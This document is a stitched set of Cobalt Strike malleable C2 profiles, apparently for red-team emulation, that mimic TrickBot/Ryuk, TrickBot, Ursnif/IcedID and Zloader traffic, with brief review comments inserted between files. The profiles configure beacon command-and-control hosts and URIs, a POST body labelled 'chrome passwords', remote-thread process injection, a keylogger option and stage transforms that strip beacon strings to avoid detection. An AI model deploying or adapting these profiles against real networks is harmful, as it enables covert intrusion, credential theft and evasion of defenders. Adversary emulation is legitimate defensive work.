90 append "irc_channel\":\"null\",\"irc_nickname\":\"jI87fg\",\"irc_password\":\"K8gtr$4\",\"irc_port\":\"6669\",\"irc_server\":\"Setting+up+IRC+service.\",\"machine_active_time\":\"12\",\"machine_artct\":\"x86\",\"machine_bitcoin_value\":\"0\",\"machine_business_value\":\"0\",\"machine_calls_activity\":\"0\",\"machine_camera_activity\":\"8\",\"machine_country_iso_code\":\"8864\",\"machine_creadit_card_posiblty\":\"0\",\"machine_current_time\":\"10:32:45\",\"machine_facebook_activity\":\"0\",\"machine_gaming_value\":\"0\",\"machine_gmail_avtivity\":\"0\",\"machine_googlepluse_activity\":\"0\",\"machine_instgram_activity\":\"0\",\"machine_ip\":\"10.1.23.146\",\"machine_lat\":\"0\",\"machine_lng\":\"eng\",\"machine_os_type\":\"win\",\"machine_register_date\":\"0222\",\"machine_screenshot\":\"1";
91 print;
92 }
93 }
94 }
95
96 http-stager {
97
98 set uri_x86 "/clients2.google.com/generate_204";
99 set uri_x64 "/clients3.google.com/generate_204";
100
101 client {
102
103 header "Host" "acpananma.com";
104
105 }
106
107 server {
108 header "Server" "Apache";
109 header "X-Powered-By" "PHP/5.6.36";
110 header "Vary" "Accept-Encoding";
111 header "Content-Type" "text/html; charset=UTF-8";
112
113 output{
114 prepend "ok\n";
115 prepend "2\n";
116
117 append "0\n";
118 print;
119 }
120
121 }
122
123
124 }
125
126
127
128
129 ###Malleable PE Options###
130
131 post-ex {
132
133 set spawnto_x86 "%windir%\\syswow64\\wscript.exe";
134 set spawnto_x64 "%windir%\\sysnative\\wscript.exe";
135
136 set obfuscate "false";
137
138 set smartinject "false";
139
140 set amsi_disable "false";
141
142 }
143
144 #used peclone on sample from https://app.any.run/tasks/54fe7d78-91d9-4d45-8b65-7333c2c7d480/
145 stage {
146 set checksum "0";
147 set compile_time "12 Feb 2019 14:33:03";
148 set entry_point "159022";
149 set image_size_x86 "548864";
150 set image_size_x64 "548864";
151 #set name "";
152 set userwx "false";
153 set cleanup "false";
154 set stomppe "false";
155 set obfuscate "false";
156 set rich_header "";
157
158 set sleep_mask "false";
159
160 # set module_x86 "";
161 # set module_x64 "";
162
163 transform-x86 {
164 # prepend "\x90\x90\x90";
165 # strrep "ReflectiveLoader" "6ayBRVW";
166 # strrep "beacon.dll" "uVRWRut";
167 }
168
169 transform-x64 {
170 # prepend "\x90\x90\x90";
171 # strrep "ReflectiveLoader" "6ayBRVW";
172 # strrep "beacon.x64.dll" "uVRWRut";
173 }
174
175 #can set a string in the .rdata section of the beacon dll.
176 #adds a zero-terminated string
177 #string "something";
178
179 #adds a string 'as-is'
180 #data "something";
181
182 #adds a wide (UTF-16LE encoded) string
183 #stringw "IMAGE_SCN_MEM_READ";
184 }
185
186
187 #controls process injection behavior
188 process-inject {
189
190 # set allocator "NtMapViewOfSection";
191
192 # set min_alloc "16700";
193
194 set userwx "false";
195
196 set startrwx "true";
197
198 transform-x86 {
199 # prepend "\x90\x90\x90";
200 }
201 transform-x64 {
202 # prepend "\x90\x90\x90";
203 }
204
205 execute {
206 # CreateThread "ntdll!RtlUserThreadStart";
207 CreateThread;
208 NtQueueApcThread;
209 CreateRemoteThread;
210 RtlCreateUserThread;
211 }
212 }
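Review bot: `output{` in the http-stager server block is the only place in this profile, and in the other profiles of this commit, where the brace is not separated from the keyword; `output {` is the form used everywhere else and is worth matching. Separately, the http-post server block sets `header "Host" "acpananma.com";`, but Host is a request header and every other server block in this commit emits response headers only; unless that line reproduces an observed response, it appears to have been copied from the client block above and should either be removed or annotated.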
0 #trick_ryuk.profile
1 #for CS 4.2, if not then c2lint will not like it.
2 #https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf
3 #https://unit42.paloaltonetworks.com/wireshark-tutorial-examining-trickbot-infections/
4 #xx0hcd
5
6 ###Global Options###
7 set sample_name "trick_ryuk.profile";
8
9 set sleeptime "5000";
10 set jitter "20";
11 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
12
13 set host_stage "true";
14
15 ###DNS options###
16 set dns_idle "8.8.8.8";
17 set maxdns "245";
18 set dns_sleep "0";
19 set dns_stager_prepend "";
20 set dns_stager_subhost "";
21 set dns_max_txt "252";
22 set dns_ttl "1";
23
24 ###SMB options###
25 set pipename "ntsvcs##";
26 set pipename_stager "scerpc##";
27
28 ###TCP options###
29 set tcp_port "8000";
30
31 ####SSH options###
32 set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
33 set ssh_pipename "SearchTextHarvester##";
34
35 ###SSL Options###
36
37 #https-certificate {
38 #set keystore "";
39 #set password "";
40 #}
41
42 #https-certificate {
43 # set C "US";
44 # set CN "whatever.com";
45 # set L "California";
46 # set O "whatever LLC.";
47 # set OU "local.org";
48 # set ST "CA";
49 # set validity "365";
50 #}
51
52 #code-signer {
53 #set keystore "your_keystore.jks";
54 #set password "your_password";
55 #set alias "server";
56 #}
57
58 ###HTTP-Config Block###
59 #http-config {
60 # set headers "Server, Content-Type";
61 # header "Content-Type" "text/html;charset=UTF-8";
62 # header "Server" "nginx";
63 #
64 # set trust_x_forwarded_for "false";
65 #}
66
67 ###HTTP-GET Block###
68
69 http-get {
70
71 set uri "/dd05ce3a-a9c9-4018-8252-d579eed1e670.zip";
72
73 client {
74
75 header "Accept" "text/html, application/xhtml+xml, */*";
76 header "Accept-Language" "en-US";
77 header "Host" "23.95.97.59";
78 header "Connection" "Keep-Alive";
79
80
81 metadata {
82
83 base64url;
84 prepend "SESSIONID=";
85 header "Cookie";
86
87 }
88
89 }
90
91 server {
92 header "Server" "Apache";
93 header "Upgrade" "h2,h2c";
94 header "Connection" "Upgrade, Keep-Alive";
95 header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT";
96 header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\"";
97 header "Accept-Ranges" "bytes";
98 header "Vary" "Accept-Encoding,User-Agent";
99 header "Keep-Alive" "timeout=5";
100
101 output {
102
103 netbios;
104
105 prepend "PK.........080..W.3
106 ...1.....InvoiceStatement.lnk.Z_.^G..m.j.....\".....f{...
107 7..464.v7.6M..b.o.m..&.M6.
108 ....\"..E..|..P.(R%.J..A.....'..9g...L>....;..;3g........B..1S..
109 3.........V....v.......|.....>";
110
111 append ".....achor_dns.....";
112
113 print;
114 }
115 }
116 }
117
118 #HTTP-GET VARIANT
119 http-get "get_ryuk" {
120
121 set uri "/files";
122
123 client {
124
125 metadata {
126
127 base64url;
128 prepend "SESSIONID=";
129 header "Cookie";
130
131 }
132
133 }
134
135 server {
136
137 output {
138
139 netbios;
140
141 prepend "";
142
143 append "";
144
145 print;
146 }
147 }
148 }
149
150 ###HTTP-POST VARIANT###
151
152 http-post "post_ryuk" {
153
154 set uri "/id";
155 set verb "GET";
156
157 client {
158
159 output {
160 netbios;
161 parameter "1";
162 }
163 id {
164 base64url;
165 parameter "id";
166
167 }
168 }
169 server {
170 output {
171 netbios;
172 print;
173 }
174 }
175 }
176
177
178 ###HTTP-Post Block###
179
180 http-post {
181
182 set uri "/ono19/ADMIN-DESKTOP.AC3B679F4A22738281E6D7B0C5946E42/81/";
183 #set verb "GET";
184 set verb "POST";
185
186 client {
187
188 header "Accept" "*/*";
189 #header "Host" "";
190 #header "Connection" "close";
191 header "Content-Type" "multipart/form-data; boundary=-----------KMOGEEQTLQTCQMYE";
192
193
194 output {
195 netbios;
196 #prepend "SESSIONID=";
197 #header "COOKIE";
198 prepend "-----------KMOGEEQTLQTCQMYE
199 Content-Disposition: form-data; name=\"data\"
200
201 https://nytimes.com/|Admin|";
202 append "\n-----------KMOGEEQTLQTCQMYE
203 Content-Disposition: form-data; name=\"source\"
204
205 chrome passwords
206 -----------KMOGEEQTLQTCQMYE--";
207
208 print;
209
210 }
211
212 id {
213 base64url;
214 parameter "id";
215
216 }
217 }
218
219 server {
220
221 header "Connection" "close";
222 header "Server" "Cowboy";
223 header "Content-Type" "text/plain";
224
225
226 output {
227 netbios;
228
229 prepend "/1/\n";
230
231 append "";
232
233 print;
234 }
235 }
236 }
237
238 ###HTTP-Stager Block###
239 http-stager {
240
241 set uri_x86 "/dd05ce3a-a9c9-4018-8252-D579eed1e670.zip";
242 set uri_x64 "/Dd05ce3a-a9c9-4018-8252-d579eed1e670.zip";
243
244 client {
245
246 header "Host" "51.254.25.115";
247 header "Connection" "Keep-Alive";
248
249 }
250
251 server {
252
253 header "Server" "Apache";
254 header "Upgrade" "h2,h2c";
255 header "Connection" "Upgrade, Keep-Alive";
256 header "Last-Modified" "Wed, 25 Sep 2019 08:23:20 GMT";
257 header "ETag" "\"9d441d3-dda-5935c5d9faea6-gzip\"";
258 header "Accept-Ranges" "bytes";
259 header "Vary" "Accept-Encoding,User-Agent";
260 header "Keep-Alive" "timeout=5";
261
262 output {
263
264 print;
265 }
266
267 }
268 }
269
270
271 ###Malleable PE/Stage Block###
272
273 #some options taken from -> https://otx.alienvault.com/indicator/file/7b9526f82448d0a1fb59a8125d1de55e3a166d72
274 stage {
275 set checksum "0";
276 set compile_time "16 Apr 2020 17:56:00";
277 set entry_point "170000";
278 set image_size_x86 "383992";
279 set image_size_x64 "383992";
280 #set name "WWanMM.dll";
281 set userwx "false";
282 set cleanup "false";
283 set sleep_mask "false";
284 set stomppe "false";
285 set obfuscate "false";
286 set rich_header "bd8cf6bfbbaf89f44f2e0189ce41549f4d4c550a712cc5660619e4ac3b4adce9";
287
288 #new 4.2. options
289 #set allocator "HeapAlloc";
290 #set magic_mx_x86 "MZRE";
291 #set magic_mz_x64 "MZAR";
292 #set magic_pe "PE";
293
294 set sleep_mask "false";
295
296 #set module_x86 "wwanmm.dll";
297 #set module_x64 "wwanmm.dll";
298
299 transform-x86 {
300 #prepend "\x90\x90\x90";
301 strrep "ReflectiveLoader" "";
302 strrep "beacon.dll" "";
303 }
304
305 transform-x64 {
306 #prepend "\x90\x90\x90";
307 strrep "ReflectiveLoader" "";
308 strrep "beacon.x64.dll" "";
309 }
310
311 string ",Control_RunDLL \x00";
312 string "start program with cmdline \"%s";
313 string "Global\\fde345tyhoVGYHUJKIOuy";
314 string "get command: incode %s, cmdid \"%s\", cmd \"%s ";
315 string "anchorDNS";
316 string "Anchor_x86";
317 string "Anchor_x64";
318 string "{43 00 4F 00 4E 00 4F 00 55 00 54 00 24 00 00 00}";
319 string "{6B 65 72 6E 65 6C 33 32 2E 64 6C 6C 00 00 00 00}";
320 string "checkip.amazonaws.com";
321 string "wtfismyip.com";
322 string "{83 C4 04 3D 80 00 00 00 73 15 8B 04 85 ?? ?? ?? ?? 85 C0 74 0A 8D 4D D8 51 8B CF FF D0 8A D8 84 DB C7 45 A4 0F 00 00 00}";
323 string "{48 98 B9 E7 03 00 00 48 3D 80 00 00 00 73 1B 48 8D 15 ?? ?? ?? ?? 48 8B 04 C2 48 85 C0 74 0B 48 8D 55 90 48 8B CE FF D0 8B C8}";
324 string ":\\Anchor\\Win32\\Release\\Anchor_";
325
326 }
327
328 ###Process Inject Block###
329 process-inject {
330
331 #set allocator "NtMapViewOfSection";
332
333 set min_alloc "16700";
334
335 set userwx "false";
336
337 set startrwx "false";
338
339 transform-x86 {
340 #prepend "\x90\x90\x90";
341 }
342 transform-x64 {
343 #prepend "\x90\x90\x90";
344 }
345
346 execute {
347 CreateThread;
348 CreateRemoteThread;
349
350 CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
351
352 SetThreadContext;
353
354 NtQueueApcThread-s;
355
356 #NtQueueApcThread;
357
358 CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
359
360 RtlCreateUserThread;
361 }
362 }
363
364 ###Post-Ex Block###
365 post-ex {
366
367 set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
368 set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
369
370 set obfuscate "false";
371
372 set smartinject "false";
373
374 set amsi_disable "false";
375
376 #new 4.2 options
377 set thread_hint "ntdll.dll!RtlUserThreadStart";
378 set pipename "DserNamePipe##";
379 set keylogger "SetWindowsHookEx";
380
381 }
0 #trickbot
1 #https://community.rsa.com/community/products/netwitness/blog/2017/07/13/necurs-delivers
2 #https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/
3 #xx0hcd
4
5
6 set sleeptime "30000";
7 set jitter "20";
8 set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)";
9 set dns_idle "8.8.8.8";
10 set maxdns "235";
11
12
13 http-get {
14
15 set uri "/";
16
17 client {
18
19 header "Host" "203.150.19.63:443";
20 header "Connection" "Keep-Alive";
21 header "Cache-Control" "no-cache";
22
23
24 metadata {
25 base64url;
26 prepend "D007=";
27 header "Cookie";
28
29
30 }
31
32 }
33
34 server {
35
36 header "Server" "nginx";
37 header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
38 header "Content-Type" "text/html";
39 header "Connection" "keep-alive";
40
41
42 output {
43 base64url;
44 prepend "<html>
45 <head><title>404 Not Found</title></head>
46 <body bgcolor='white'>
47 <center><h1>404 Not Found</h1></center>
48 <hr><center>nginx</center>
49 </body>
50 </html>
51 <!CDATA['=";
52 append "']>
53 </html>";
54 print;
55 }
56 }
57 }
58
59 http-post {
60
61 set uri "/response.php";
62
63 client {
64
65 header "Content-Type" "multipart/form-data; boundary=----ZMZTCR";
66
67 output {
68 netbios;
69 prepend "----ZMZTCR
70 Content-Disposition: form-data;name='sourcelink' ";
71
72 append " Content-Disposition: form-data;name='sourcequery'
73 ----ZMZTCR";
74 print;
75
76
77
78 }
79
80
81 id {
82 base64url;
83 header "Cookie";
84
85
86 }
87 }
88
89 server {
90
91 header "Server" "nginx";
92 header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
93 header "Content-Type" "text/html; charset=utf-8";
94 header "Connection" "keep-alive";
95
96
97 output {
98 base64;
99 print;
100 }
101 }
102 }
103
104 http-stager {
105 server {
106 header "Server" "nginx";
107 header "Date" "Fri, 30 Jun 2017 13:08:47 GMT";
108 header "Content-Type" "text/html; charset=utf-8";
109 header "Connection" "keep-alive";
110
111 }
112
113
114 }
0 #ursnif_IcedID malware profile
1 #https://www.malware-traffic-analysis.net/2018/11/08/index.html
2 #xx0hcd
3
4
5 set sleeptime "30000";
6 set jitter "20";
7 set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko";
8 set dns_idle "8.8.8.8";
9 set maxdns "235";
10 set sample_name "urnif_IcedID profile";
11
12
13 #https-certificate {
14 # set keystore "demo.store";
15 # set password "whateverpass";
16 #}
17
18
19 #prob have to change Host header to something legit depending on testing.
20 http-get {
21
22 set uri "/images/U2gVFoeT1Sh8s/";
23
24 client {
25
26 header "Host" "jititliste.com";
27 header "Accept" "text/html, application/xhtml+xml, */*";
28 header "Accept-Language" "en-US";
29 header "DNT" "1";
30 header "Connection" "Keep-Alive";
31
32
33 metadata {
34 netbios;
35 parameter "id";
36
37 }
38
39 }
40
41 server {
42
43 header "Server" "Apache/2.2.22 (Debian)";
44 header "X-Powered-By" "PHP/5.4.45-0+deb7u14";
45 header "Pragma" "no-cache";
46 header "Set-Cookie" "lang=en; expires=Sat, 08-Dec-2018 15:50:58 GMT; path=/; domain=.jititliste.com; id=";
47 header "Vary" "Accept-Encoding";
48 header "Keep-Alive" "timeout=5, max=100";
49 header "Connection" "Keep-Alive";
50 header "Content-Type" "text/html";
51
52
53
54
55
56 #using newline ("\n") shows as a period (".") in c2lint, but looks correct in wireshark.
57 output {
58
59 netbios;
60 prepend "1faa\n";
61 print;
62
63 }
64 }
65 }
66
67 http-post {
68
69 set verb "GET";
70 set uri "/data2.php";
71
72 client {
73
74 header "Host" "themiole.biz";
75 header "Upgrade" "websocket";
76 header "Connection" "Upgrade";
77
78 output {
79 netbios;
80 prepend "PHPSESSID=";
81 header "Cookie";
82
83
84 }
85
86
87 id {
88 netbios;
89 parameter "";
90
91
92 }
93 }
94
95 server {
96
97 header "Server" "openresty";
98 header "Connection" "upgrade";
99 header "Sec-Websocket-Accept" "Kfh9QIsMVZc16xEPYxPHzW8SZ8w-";
100 header "Upgrade" "websocket";
101
102
103
104 output {
105 netbios;
106 prepend ".";
107 prepend "..NPyo=....\n";
108 append ".......... .......... ..........";
109 print;
110 }
111 }
112 }
113
114 http-stager {
115
116 set uri_x86 "/WES/Fatog.php";
117 set uri_x64 "/WES/fatog.php";
118
119 client {
120 header "Host" "mnesenesse.com";
121 header "Connection" "Keep-Alive";
122 }
123
124 server {
125 header "Server" "Apache/2.2.15 (CentOS)";
126 header "X-Powered-By" "PHP/7.2.11";
127 header "Content-Discription" "File Transfer";
128 header "Content-Disposition" "attachment; filename=\"ledo2.xap\"";
129 header "Content-Type" "application/octet-stream";
130 header "Cache-Control" "must-revalidate";
131 header "Connection" "close";
132
133 }
134
135
136 }
137
138
139 stage {
140 set checksum "0";
141 set compile_time "12 Jun 2018 11:22:23";
142 set image_size_x86 "543900";
143 set image_size_x64 "543900";
144 transform-x86 {
145 strrep "beacon.dll" "";
146 }
147 transform-x64 {
148 strrep "beacon.x64.dll" "aoushdquwe.exe";
149 }
150
151 }
152
153
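Review bot: The `sample_name` on line 10 reads `"urnif_IcedID profile"` while the header comment on line 0 names the family ursnif_IcedID; the missing `s` looks like a typo, `set sample_name "ursnif_IcedID profile";`. The `Content-Discription` header on line 127 of the http-stager server block is also misspelled; if it was copied verbatim from the referenced capture that may be intentional, otherwise it should read `Content-Description`, and a one-line comment saying which is the case would save the next reader the same question.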
0 #zloader.profile
1 #https://app.any.run/tasks/7c83ff58-4c40-4a41-958b-d9279b917f2b/
2 #https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/
3
4 #xx0hcd
5
6 ###Global Options###
7 set sample_name "zloader.profile";
8
9 set sleeptime "37500";
10 set jitter "26";
11 set useragent "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36";
12
13 set host_stage "true";
14
15 ###DNS options###
16 set dns_idle "8.8.8.8";
17 set maxdns "245";
18 set dns_sleep "0";
19 set dns_stager_prepend "";
20 set dns_stager_subhost "";
21 set dns_max_txt "252";
22 set dns_ttl "1";
23
24 ###SMB options###
25 set pipename "ntsvcs";
26 set pipename_stager "scerpc";
27
28 ###TCP options###
29 set tcp_port "8000";
30
31 ###SSL Options###
32
33 #https-certificate {
34 #set keystore "";
35 #set password "";
36 #}
37
38 #https-certificate {
39 # set C "US";
40 # set CN "whatever.com";
41 # set L "California";
42 # set O "whatever LLC.";
43 # set OU "local.org";
44 # set ST "CA";
45 # set validity "365";
46 #}
47
48 #code-signer {
49 #set keystore "your_keystore.jks";
50 #set password "your_password";
51 #set alias "server";
52 #}
53
54 ###HTTP-Config Block###
55 #http-config {
56 # set headers "Server, Content-Type";
57 # header "Content-Type" "text/html;charset=UTF-8";
58 # header "Server" "nginx";
59 #
60 # set trust_x_forwarded_for "false";
61 #}
62
63 ###HTTP-GET Block###
64
65 http-get {
66
67 set uri "/wp-content/themes/calliope/wp_data.php";
68
69 client {
70
71 header "Accept" "*/*";
72 header "Host" "wmwifbajxxbcxmucxmlc.com";
73 header "Connection" "Keep-Alive";
74
75
76 metadata {
77
78 base64url;
79 prepend "SESSIONID=";
80 header "Cookie";
81
82 }
83
84 }
85
86 server {
87 header "Server" "nginx";
88 header "Content-Type" "application/x-msdos-program";
89 header "Connection" "close";
90 header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT";
91 header "ETag" "\"76200-5a41168e83140\"";
92 header "Accept-Ranges" "bytes";
93
94 output {
95
96 netbios;
97
98 prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
99
100 $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u
101 ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^..........
102 'R.......S...C..V.5 C..+....L$...C...
103 ,R.........+R.....f.D$..P...W.=";
104
105 append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k
106 .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R....
107 \"R..........u...C....E......C.........*
108 .C......L$..
109 ,R....@+
110 .C...
111 .C....
112 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$..
113 ,R....@+......C...|$ Z...u...
114 (R....+.......5 C...L$...T.
115 ..|$ Z....9u...
116 (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r
117 .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r
118 .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r
119 ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r
120 .6........j..F......F.....j.............t.SQP.........~..r
121 .6.........E.......~..^....r........M.d.
122 ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t
123 ....x..u.3.]..@.].U...=,.....(...t..M.9.t
124 ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;";
125
126 print;
127 }
128 }
129 }
130
131 #HTTP-GET VARIANT
132 http-get "variant_april24dll" {
133
134 set uri "/files/april24.dll";
135
136 client {
137
138 header "Accept" "*/*";
139 header "Host" "wmwifbajxxbcxmucxmlc.com";
140 header "Connection" "Keep-Alive";
141
142
143 metadata {
144
145 base64url;
146 prepend "SESSIONID=";
147 header "Cookie";
148
149 }
150
151 }
152
153 server {
154 header "Server" "nginx";
155 header "Content-Type" "application/x-msdos-program";
156 header "Connection" "close";
157 header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT";
158 header "ETag" "\"76200-5a41168e83140\"";
159 header "Accept-Ranges" "bytes";
160
161 output {
162
163 netbios;
164
165 prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode.
166
167 $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u
168 ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^..........
169 'R.......S...C..V.5 C..+....L$...C...
170 ,R.........+R.....f.D$..P...W.=";
171
172 append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k
173 .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R....
174 \"R..........u...C....E......C.........*
175 .C......L$..
176 ,R....@+
177 .C...
178 .C....
179 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$..
180 ,R....@+......C...|$ Z...u...
181 (R....+.......5 C...L$...T.
182 ..|$ Z....9u...
183 (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r
184 .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r
185 .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r
186 ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r
187 .6........j..F......F.....j.............t.SQP.........~..r
188 .6.........E.......~..^....r........M.d.
189 ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t
190 ....x..u.3.]..@.].U...=,.....(...t..M.9.t
191 ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;";
192
193 print;
194 }
195 }
196 }
197
198 ###HTTP-Post Block###
199
200 #parameters from a similar sample = https://github.com/tatsui-geek/malware-traffic-analysis.net/blob/master/2016-12-30-Sundown-EK-1st-run-sends-Terdot.A-Zloader.pcap
201 http-post {
202
203 set uri "/post.php";
204 #set verb "GET";
205 set verb "POST";
206
207 client {
208
209 header "Accept" "*/*";
210 header "Cache-Control" "no-cache";
211 header "Host" "wmwifbajxxbcxmucxmlc.com";
212 header "Connection" "close";
213
214
215 output {
216 base64url;
217 parameter "FE8hVs3";
218
219 }
220
221 id {
222 base64url;
223 parameter "id";
224
225 }
226 }
227
228 server {
229
230 header "Server" "nginx";
231 header "Content-Type" "text/html; charset=UTF-8";
232 header "Connection" "close";
233
234 output {
235 netbios;
236
237 prepend "..\"N ......0.9..5......Tb....\"shb.fL.....t....u.......s...D.{...Qv&[email protected]$..y.q,P....Nn~..O .[..Lo..{.Z.....yKd.B..o.M>..J...~n.D0..Bm.:.Tx... [email protected]..!.%...BC.\\I.7C..U..X..D.4....h........'m......gXaQ..<.....X..]...%5.Fx.LO..D._I~.@$.R[..p...<";
238
239 append ">2...........{..\"..~=....._...Nu...s.mm.....u..lV..r......g2)r.w.'G2.*Y.i.,.9...o...t..zhX.h....K=........AS";
240
241 print;
242 }
243 }
244 }
245
246 ###HTTP-Stager Block###
247 http-stager {
248
249 set uri_x86 "/wp-content/themes/wp-front.php";
250 set uri_x64 "/wp-content/themes/wp_data.php";
251
252 client {
253
254 header "Host" "wmwifbajxxbcxmucxmlc.com";
255 header "Connection" "Keep-Alive";
256
257 }
258
259 server {
260
261 header "Server" "nginx";
262 header "Content-Type" "text/html; charset=UTF-8";
263 header "Connection" "close";
264
265 output {
266
267 print;
268 }
269
270 }
271 }
272
273
274 ###Malleable PE/Stage Block###
275
276 #filled this out best I could.
277 stage {
278 set checksum "0";
279 set compile_time "16 Apr 2020 17:56:00";
280 set entry_point "170000";
281 set image_size_x86 "740000";
282 set image_size_x64 "740000";
283 #set name "WWanMM.dll";
284 set userwx "false";
285 set cleanup "false";
286 set sleep_mask "false";
287 set stomppe "false";
288 set obfuscate "false";
289 set rich_header "";
290
291 set sleep_mask "false";
292
293 #set module_x86 "wwanmm.dll";
294 #set module_x64 "wwanmm.dll";
295
296 transform-x86 {
297 #prepend "\x90\x90\x90";
298 strrep "ReflectiveLoader" "";
299 strrep "beacon.dll" "";
300 }
301
302 transform-x64 {
303 #prepend "\x90\x90\x90";
304 strrep "ReflectiveLoader" "";
305 strrep "beacon.x64.dll" "";
306 }
307
308 #from yara strings = https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-03-20-zloader-generic-yara-vk.yar
309 string "{EE 03 00 00 E9 03 00 00 EE 03 00 00 EF 03 00 00 F0 03 00 00 EE 03 00 00 EE 03 00 00 EA 03 00 00 EC 03 00 00 EB 03 00 00 ED 03 00 00}";
